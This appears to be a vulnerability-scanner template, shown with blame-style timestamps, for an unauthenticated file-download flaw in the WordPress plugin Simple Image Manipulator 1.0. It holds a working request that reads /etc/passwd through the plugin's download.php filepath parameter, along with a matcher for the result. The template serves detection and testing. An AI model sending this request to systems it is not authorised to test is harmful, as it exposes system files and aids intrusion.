2022-02-15 11:56:32 +00:00
id : simple-image-manipulator-lfi
2022-02-12 18:14:11 +00:00
info :
2022-02-15 11:56:32 +00:00
name : Simple Image Manipulator v1.0 - Remote file download
2022-02-12 18:14:11 +00:00
author : dhiyaneshDK
severity : high
description : In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location.
2022-04-22 10:38:41 +00:00
reference :
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
2022-02-15 11:56:32 +00:00
tags : wordpress,wp-plugin,lfi,wp
2022-02-12 18:14:11 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200